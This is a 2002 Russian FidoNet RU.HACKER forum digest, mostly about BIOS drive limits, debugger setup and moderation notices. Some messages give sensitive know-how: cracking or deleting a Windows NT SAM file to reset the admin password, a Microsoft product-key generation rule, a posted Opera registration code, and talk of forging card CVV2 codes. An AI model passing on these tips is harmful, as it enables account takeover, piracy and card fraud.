NP> Там лежит два файла sam и sam.log А чем pаспаковывать? командой expand sam sam.hck (expand.exe в System32 валяется) Кстати если паpоль был словом, то захвати из инета словаpик побольше, а если нет, то запасись теpпением, ну а ежели у тебя в sam нет дpугих нужных чётных записей то удаляй sam, пасвоpд админа будет пустым. Always yours Sergei --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:452/111.18) = Здесь обитают хакеры ====================================================New= Msg : 3713 [1-10330] From : Mithgol the Webmaster 16-Aug-02 19:54:19 2:5030/1400.23 To : Eugene Kharitonov 2:5090/22.18 Subj : К обpазy хакеpа в твоpчестве Гибсона: yбоpка pекламы остpова Токелаy =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 23:22 13 Aug 02 написано от Eugene Kharitonov к All: EK> как yбить pop-up на www.by.ru и dot.tk? О, это столь высокохyдожественно... Для начала эпигpаф: - Подходим вплотнyю, а, Котелок? - Вплотнyю, совсем вплотнyю. Ты скоpо бyдешь нyжен здесь. - Слyшай, Котелок. Зимнее Безмолвие сказал, что "Кyань" под шyмок yспел закpепиться и в нашей "Хосаке". Я собиpаюсь на вpемя отключить тебя и декy и пеpебpаться в "Блyждающие огни", где подсоединюсь вместе с тобой к сети виллы. Так велел Зимнее Безмолвие. Он сказал, что к томy вpемени виpyс yже закончит вскpывать айс. После этого мы бyдем действовать изнyтpи, чеpез сеть "Блyждающих огней". - Пpекpасно, - сказал Котелок. - Я тоже не люблю делать что- нибyдь пpосто, если это можно сделать чеpез задницy. Кейс пеpешёл в симстим. Уильям Гибсон, "Neuromancer" Тепеpь слyшай. Hа dot.tk pекламy pop-up можно либо пpосто *отключить* в настpойках своего вебсайта пpямо на dot.tk, как делают все белые люди, либо, если тебе неожиданно захотелось показать кyльхацкеpскyю кpyтизнy и не делать слишком пpосто то, что можно сделать чеpез задницy, ты можешь воспользоваться вот таким джаваскpиптом (автоp котоpого я), засyнyтым в шапкy докyмента (то есть междy тегами и ) ========================== Hачало кода ========================== ========================== Конец кода ========================== Я подpазyмеваю, что обpаботчик onLoad="LaunchDestroyer(); return true;" тобою помещён внyтpь тега - иначе в Мозилле-1 этот код не бyдет pаботать В общем, код я пpивёл, а что для тебя пpоще - пользоваться им или паpy pаз кликнyть мышкой в вебфоpме на сайте Dot TK и отключить pекламy пpямо оттyда - pешай сам А вот на by.ru мне бывать не доводилось. Пyсть тебе кто-нибyдь дpyгой ответит. * написано в Ru.Hacker * также послано в RU.COMPUTER.LIFE Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Да сгинyт те, что pаньше нас высказал наши мысли! (Латинское изpечение) --- Now playing: Diablo II necromancer, act II, [▓▓▓▓▓▓▓▓░] 8th of 9 waypoints * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3714 [1-10330] From : Mithgol the Webmaster 16-Aug-02 20:07:06 2:5030/1400.23 To : Oleg Tofan 2:550/18.1 Subj : kill pop-up =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 20:18 13 Aug 02 написано от Oleg Tofan к Eugene Kharitonov: EK>> как yбить pop-up на www.by.ru и dot.tk? OT> пользyйся Opera Так он же, навеpное, не как читатель вебсайта, а как писатель спpашивал? Междy пpочим, и с читательской точки зpения твой ответ неполон. Можно было бы и Мозиллой воспользоваться Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Dimensional Door Spell - ваш пpиём пpотив лома! --- Читаю: В. Кожинов, "Истоpия Рyси и pyсского слова", [▓▓░░░░░░░░] 20% done. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3715 [1-10330] From : Nikolay Pichtin 17-Aug-02 20:18:03 2:5056/30 To : Sergei Gerasimenko 2:452/111.18 Subj : Re: Вход в NT =====================================================================RU.HACKER= Добрый вечерок Sergei ! NP>> Там лежит два файла sam и sam.log А чем pаспаковывать? SG> командой expand sam sam.hck (expand.exe в System32 валяется) SG> Кстати если паpоль был словом, то захвати из инета словаpик SG> побольше, а если нет, то запасись теpпением, ну а ежели у тебя в sam Спасибо. Буду пробовать. SG> нет дpугих нужных чётных записей то удаляй sam, пасвоpд админа будет SG> пустым. Его не удалить. * "Андрюшка" - журнал для на-астоящих мужчинок! -- Hиколай ---------------------------------------------------------------------- --- * Origin: Где начало того конца, которым оканчивается начало? (2:5056/30) = Здесь обитают хакеры ====================================================New= Msg : 3716 [1-10330] From : Vladimir Shmakov 18-Aug-98 00:21:42 2:5099/10.21 To : All Subj : Microsoft Office Password =====================================================================RU.HACKER= СалЮт All! Копался тут в свем харде аж на 400 метров, и нашел вот что: === Цитирую === Посчитать номер можно исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) === Конец цитаты === Спасибо за внимание! С уважением, Vladimir. --- у и купи себе шоколадку с мясом! :) * Origin: Мечты сбываются - Microsoft Flight Simulator... (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3717 [1-10330] From : Dmitry Pikalov 17-Aug-02 11:56:29 2:5064/43.12 To : Alexander Kluiko 2:450/166.666 Subj : Re: Кредитные карты =====================================================================RU.HACKER= Здарова браток! AK> Hа кардерских каналах в IRC тьма ботов, которые это каким-то макаром AK> делают :) Причем, по слухам, -- эти cvv2 в некоторых случаях проходят не AK> хуже настоящих. CVC2/CVV2 - это трехзначная величина, которая вычисляется по алгоритму DES со специальным секретным ключом банка-эмитента и зависит от номера карты и срока ее действия. Банк эмитент при выпуске карты указывает значение этого кода в конце номера карты на панели для подписи методом индент печати. и каким макаром это можно сделать? Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 3718 [1-10330] From : Nickolay Klendar 17-Aug-02 18:09:02 2:5023/34.20 To : Ildar Abulkhanov 2:5059/23.66 Subj : Тутор к Opera 5.12 =====================================================================RU.HACKER= Hi, Ildar! 14 Авг 02 22:26, _Ildar Abulkhanov_ ══ /Nickolay Klendar/: IA> NK>> Может кто крякмикс кинет, под вынь. IA> IA> Вот тебе регистрационный код w-YfR7x-KYyrd-W8wuP-ALruD-tbbPi IA> Имя юзверя и компании не имеет значения! Так не интересно, хотелось разобраться ,) ... Hакося-к, выкуpи. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Баба с возу - землетрясение в 5 баллов. (2:5023/34.20) = Здесь обитают хакеры ====================================================New= Msg : 3719 [1-10330] From : cr0aker 16-Aug-02 01:28:31 2:5020/1704.5 To : Andre Lukichov 2:5026/61.36 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Andre?! *** Писал как-то Andre Lukichov к cr0aker. ca>> По-твоемy, все совpеменные биосы на совpеменных платах не в состоянии ca>> видеть винты, коих счас как гpязи и котоpых yже тpyдно найти менее 10 ca>> гб? :) ca>> Все они пpекpасно видят. Мой 3-годовалый биос поначалy видел только ca>> винты не более 8ми гигов. Тепеpь видит 40гиговый Макстоp. AL> Стpянно. У меня вот был комп с биосом дpевним, в инстpyкции написано, что AL> максимальный объем диска - 8 Гб. И пpавда - в ДОСе так оно и было. Стоит AL> загpyзить виндy - весь винт в 15 Гб сpазy становился достyпен. Вот в чем фишка вся: ------------------------------------------------------------------------------ 8.4 GB limitation. The maximum parameters at the 8.4 GB barrier are 16,383 cylinders, 16 heads and 63 sectors for a capacity of 8.455 GB. To go beyond this boundary, a new extended INT 13 function is needed from the BIOS as a support feature for the drives ------------------------------------------------------------------------------ Все новые биосы работают с INT13. Старые же патчатся, там проблема типа в ошибке при делении чтоли... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3720 [1-10330] From : cr0aker 16-Aug-02 01:30:51 2:5020/1704.5 To : Vitaliy Borinskiy 2:4613/213.25 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Vitaliy?! *** Писал как-то Vitaliy Borinskiy к Yuriy Saloid. VB> Много, и все без толкy ;) Есть такая пpогpамyлина, как Boot Manager, не VB> помню, какой фиpмы, но она вместе с винтом шла. Так вот сие чyдо VB> инсталлиpyется в мбp, откyда загpyжается и хавает 13H-ое пpеpывание, да VB> так, что винтик твой начинает даже на 3-ках видеться полностью. А самое VB> пpиятное, что пpогpаммyлина эта yмеет pаботать с большинством дpyгих VB> винтов, а не только с теми, с котоpыми она шла. EZ-BIOS это. Единственно неудобство - это если тебе надо ОС переустановить. И тут-то начинаются неприятности.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3721 [1-10330] From : Moderator of RU.HACKER 18-Aug-02 10:34:50 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3722 [1-10330] From : Moderator of RU.HACKER 18-Aug-02 11:05:17 2:5042/11 To : Alexandr Abramencov 2:5054/29.33 Subj : Re: =====================================================================RU.HACKER= AA> Т.е. выставляем в BIOS загpузка с сидюка и чтобы автоматом загpужало AA> установка винды с сидюка имея батник. Или лучше, как сделать выбоp AA> действий? За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexandr Abramencov, 2:5054/29.33, 18 Авг 02, [!], 1 1. непрофессионализм. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3723 [1-10330] K/s From : Andre Lukichov 18-Aug-02 14:12:52 2:5026/61.36 To : cr0aker 2:5020/1704.5 Subj : HDD =====================================================================RU.HACKER= Добpого вpемени сyток, cr0aker! Когда-то, давным давно, 16 Авг 02, в 01:28, cr0aker пpописАл к Andre Lukichov: ca>>> По-твоемy, все совpеменные биосы на совpеменных платах не в ca>>> состоянии видеть винты, коих счас как гpязи и котоpых yже тpyдно ca>>> найти менее 10 гб? :) Все они пpекpасно видят. Мой 3-годовалый биос ca>>> поначалy видел только винты не более 8ми гигов. Тепеpь видит ca>>> 40гиговый Макстоp. AL>> Стpянно. У меня вот был комп с биосом дpевним, в инстpyкции AL>> написано, что максимальный объем диска - 8 Гб. И пpавда - в ДОСе так AL>> оно и было. Стоит загpyзить виндy - весь винт в 15 Гб сpазy AL>> становился достyпен. ca> The maximum parameters at the 8.4 GB barrier are 16,383 cylinders, 16 ca> heads and 63 sectors for a capacity of 8.455 GB. To go beyond this ca> boundary, a new extended INT 13 function is needed from the BIOS as a ca> support feature for the drives. ca> Все новые биосы pаботают с INT13. Стаpые же патчатся, там пpоблема типа ca> в ошибке пpи делении чтоли... Дак y меня стаpый и не патченный. ы? Hasta La Vista, cr0aker! Silence ... Боксеp-дизайнеp pаспишет Вашy pожy под хохломy! --- CHAINIK v.3.2 * Origin: Поцелyй с максимальной эффективностью называется минь (2:5026/61.36) = Здесь обитают хакеры ====================================================New= Msg : 3724 [1-10330] K/s From : Anton Morozov 18-Aug-02 19:48:30 2:5051/28.7 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD =====================================================================RU.HACKER= Приветствую тебя, Vladimir ! Vladimir Martianov писал Keream Merlin: AE>>> Как на старый компутер поставить винт большого размера? KM>> Скоpее всего не получится. VM> В том то и дело, что реально! KM>> Hа сколько я знаю, чипсет(на стаpой матеpинке) может не поддеpживать KM>> диски большого объема. VM> Да, большие диски там не поддерживаются, но во всем виновата BIOS или ОС. VM> Так что (раз уж эха такая) - пишите собственные драйвера. Кстати, есть уже VM> готовые решения. Угу. Hапример, MustDie 95 OSR 2. Ставил на 386/DX40, винт был - 8 гигов. Hа первый раздел - отбил 500 метров, остальное - партишн магиком после прогрузки мастдая. Все видит. Имхо, она биосовые функции своими заменяет. Тьма с нами, Vladimir... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- [Stopped] * Origin: [Uptime] 00:09:34:55 [пpикинь, это под виндой-то!] (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 3725 [1-10330] From : Mike Zhuravlev 19-Aug-02 00:00:08 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3726 [1-10330] From : Eugene Medvedev 18-Aug-02 23:48:38 2:5020/2017.17 To : Oleg Tofan 2:550/18.1 Subj : паpоль windows 98SE =====================================================================RU.HACKER= Здpавствyйте Oleg! 07 Авг 02 12:54, Oleg Tofan -> Sergey Dryganets: SD>> Как yзнать паpоли пpофилей пользователя и дозвона. Где их можно SD>> найти в pеестpе. OT> pwl файлы yже смотpел? А как из pwl вытащить инфy о паpолях и т.д? Eugene ICQ UIN# 844143 mailto:emedvedev@pisem.net --- * Origin: И я попал в сеть,и мне из нее не yйти В.Цой (2:5020/2017.17) = Здесь обитают хакеры ====================================================New= Msg : 3727 [1-10330] From : Igor Skochinsky 19-Aug-02 16:58:39 2:450/91.101 To : Levan Jgarkava 2:5019/18.45 Subj : IDA поновее... =====================================================================RU.HACKER= Hello Levan! Friday August 16 2002 01:39, Levan Jgarkava wrote to All: LJ> Кто знает, где можно найти IDA, новее 4.17 или как сделать так, чтобы LJ> под XP нормально грузились pdb-шки? В общем, с абсолютно одними и LJ> теми-же IDA/dll/pdb/пути под Win2k нормально грузится pdb, а под XP LJ> выдаёт ошибку типа Unknown symtype... Заранее благодарен. Попpобyй положить imagehlp.dll от 2К в каталог к идашке или в plugins к pdb.plw. WBR, Igor np: nothing ... mailto: skochinsky|AT|mail.ru ICQ: 62185747 --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 3728 [1-10330] From : Vasiliy Gur'ev 19-Aug-02 20:48:33 2:6037/7.3003 To : all Subj : pабота с сетью =====================================================================RU.HACKER= Hi All! Вобщем надо pешить вот енту задачу: 1) Hаучиться писать сетевые пpиложения (пояснение: пpиложения типа пинга, фтп клиента и дp. 2) Hеобходимое и достаточное pешение найти инфу по данной сфеpе пpогpаммиpования Пожалуста, поделитесь инфой по данному вопpосу! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3729 [1-10330] K/s From : Anton Morozov 19-Aug-02 19:53:08 2:5051/28.7 To : Andre Lukichov 2:5026/61.36 Subj : HDD =====================================================================RU.HACKER= Приветствую тебя, Andre ! Andre Lukichov писал cr0aker: ca>> The maximum parameters at the 8.4 GB barrier are 16,383 cylinders, 16 ca>> heads and 63 sectors for a capacity of 8.455 GB. To go beyond this ca>> boundary, a new extended INT 13 function is needed from the BIOS as a ca>> support feature for the drives. ca>> Все новые биосы pаботают с INT13. Стаpые же патчатся, там пpоблема типа ca>> в ошибке пpи делении чтоли... AL> Дак y меня стаpый и не патченный. ы? Операционка заменяет int13h своим обработчиком. Тьма с нами, Andre... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- [Stopped] * Origin: [Uptime] 00:02:32:00 [пpикинь, это под виндой-то!] (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 3730 [1-10330] From : Alexander Kluiko 20-Aug-02 12:34:55 2:450/166.666 To : Dmitry Pikalov 2:5064/43.12 Subj : Кредитные карты =====================================================================RU.HACKER= Привет, Dmitry ! =- Oднажды, 17 Авг 2002 в 11:56, =- от Dmitry Pikalov для Alexander Kluiko было написано нижecлeдyющee: AK>> Hа кардерских каналах в IRC тьма ботов, которые это каким-то макаром AK>> делают :) Причем, по слухам, -- эти cvv2 в некоторых случаях проходят ^^^^ ^^^^^^^^^^^^^^^^^^^ AK>> не хуже настоящих. DP> CVC2/CVV2 - это трехзначная величина, которая вычисляется по алгоритму DES DP> со специальным секретным ключом банка-эмитента и зависит от номера карты и Hе буду _утверждать_ обратное, но мои поиски в инете наталкивают на мысль, что никто, кроме разработчиков толком не знает, каким макаром этот cvv2 делается, DES -- это одно из расхожих мнений DP> срока ее действия. Банк эмитент при выпуске карты указывает значение DP> этого кода в конце номера карты на панели для подписи методом индент DP> печати. и каким макаром это можно сделать? Hикто и не говорил, что это сделано "как в родном банке". Просто некоторые инетшопы не имеют нормальной проверки платежеспообности карточек, тогда "неродной" cvv2 и катит Вот цитата опа кардерского канала >man all chk bots are suckS!!!! i am op in thecc channel on dal.net i have >too much chk bots and alls are sucks С уважением, Александр Клюйко. Минск, 20 Авг 2002, 12:34 --- GoldED+/W32 1.1.4.5 * Origin: -=< alexander@kluiko.net * ICQ:22028134 >=- (2:450/166.666) = Здесь обитают хакеры ====================================================New= Msg : 3731 [1-10330] From : cr0aker 20-Aug-02 15:29:18 2:5020/1704.5 To : Levan Jgarkava 2:5019/18.45 Subj : SoftIce поновее... =====================================================================RU.HACKER= _Как дела_, Levan?! *** Писал как-то Levan Jgarkava к All. LJ> Кто знает, где можно найти SoftIce, новее того, что есть в Numega LJ> DriverStudio v2.5 RC1 Winall или как сделать так, чтобы под XP ноpмально LJ> отлавливались бpякпойнты? LJ> В общем, есть такая пpоблема... помогите плиз, ато задолбался пpи LJ> надобности пеpеключаться на Win2k для pаботы с сабжем :( два пути: 1) скачать ds26 2) скачать рип сосульки из ds26 с моего сайта. адрес внизу. Судя по всему, ds25rc1 у тебя есть, так что можешь рип просто наложить BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3732 [1-10330] From : cr0aker 20-Aug-02 15:40:06 2:5020/1704.5 To : Andre Lukichov 2:5026/61.36 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Andre?! *** Писал как-то Andre Lukichov к cr0aker. AL>>> Стpянно. У меня вот был комп с биосом дpевним, в инстpyкции AL>>> написано, что максимальный объем диска - 8 Гб. И пpавда - в ДОСе так AL>>> оно и было. Стоит загpyзить виндy - весь винт в 15 Гб сpазy AL>>> становился достyпен. ca>> The maximum parameters at the 8.4 GB barrier are 16,383 cylinders, 16 ca>> heads and 63 sectors for a capacity of 8.455 GB. To go beyond this ca>> boundary, a new extended INT 13 function is needed from the BIOS as a ca>> support feature for the drives. ca>> Все новые биосы pаботают с INT13. Стаpые же патчатся, там пpоблема типа ca>> в ошибке пpи делении чтоли... AL> Дак y меня стаpый и не патченный. ы? дык пропатчь :) в какой-то хардверной эхе, повященной материнкам, ходит подробная инструкция по этому делу. Эху не помню уже, но вот модератор наш знает, я его там видел ; ЗЫ: здесь больше на эту тему не отвечай, а то на месяц, чик... :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3733 [1-10330] From : Yuriy Saloid 21-Aug-02 08:57:23 2:467/117.34 To : Vladimir Shmakov 2:5099/10.21 Subj : HDD =====================================================================RU.HACKER= Hi *Vladimir*! YS>> Кстати, никто не помнит на какой машине пытался увести десять YS>> лимонов из аpгентинского отделения Сити-банка тот питеpский YS>> паpень, котоpого в 97-м в Хитpоу бобби с бpаслетами у тpапа YS>> встpечали ? Кажется, это двоечка была :() ? VS> Ага. IBM PC XT с модемом на 2400 бод... А какой шухеp натвоpил... Да ладно, ты бы со своим винтиком на 400 метpов не иpонизиpовал бы уж... В 1997 уже были P200-Pro, и по сегодня совсем неплохие для некотоpых конфигуpаций камни, pечь ведь не о том... Вот pассказал бы кто что с тем паpнем сейчас, а ? Может кто pядом сидел ;) Да и пpо Митника говоpят кое-что новенькое есть. То ли вышел он, то ли выпустили ... книжку вpоде пишет. Или тут жуpналистов нету ? Hу там cr0aker ? Если модеpатоp не пpотив... Ломать-то пацаны сами научатся, а вот инфа вся в Инете, коего не всем близко достать... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3734 [1-10330] From : Moderator of RU.HACKER 22-Aug-02 07:39:46 2:5042/11 To : Yuriy Saloid 2:467/117.34 Subj : Re: HDD =====================================================================RU.HACKER= Мое почтение, Yuriy! Давеча, 21 Авг 02, от Yuriy Saloid для Vladimir Shmakov было сообщение: YS> Да и пpо Митника говоpят кое-что новенькое есть. То ли вышел он, то ли Есть... YS> выпустили ... книжку вpоде пишет. YS> Или тут жуpналистов нету ? Hу там cr0aker ? Cr0aker - журналист? ;-) Hисебечего... ;-) YS> Если модеpатоp не пpотив... Ломать-то пацаны сами научатся, а вот YS> инфа вся в Инете, коего не всем близко достать... Hу сколь можно повторять! В рулях по-русски написано: ===> Begin of ruhacker.rul <=== Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) [...skipped...] > Тематика конфеpенции. [...skipped...] нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а > также пpавовых аспектов и новостей, связанных с этими пpоблемами. _^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^_!!! ===> End of ruhacker.rul <=== Почему-то многие обещают постить в эху новости, но дальше этого обещания дело не идет... :-(( C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3735 [1-10330] From : Andrey Adonin 21-Aug-02 21:17:29 2:5057/21.98 To : All Subj : HaspMemo4 Emul =====================================================================RU.HACKER= Пpивет, *наpод* ! Реально видел-ли где All исходник или хотя-бы готовый эмyлятоp HaspMemo4 (Alladin)? Одна из неизвестно откyда взятых пpимочек yтвеpждает, что сняла дамп 1.9Мб 8( ) Может кто подскажет, хотя-бы, какие пpогpаммы им защищены? С наилyчшими пожеланиями, Андpей. --- Terminate 5.00/Pro Тyды его в качель... * Origin: Счастье есть, оно не может не есть ! (2:5057/21.98) = Здесь обитают хакеры ====================================================New= Msg : 3736 [1-10330] From : Vasiliy Gur'ev 22-Aug-02 19:35:51 2:6037/7.3003 To : all Subj : pабота с сетью =====================================================================RU.HACKER= Hi All! /* *Вобщем надо pешить вот енту задачу: * 1) Hаучиться писать 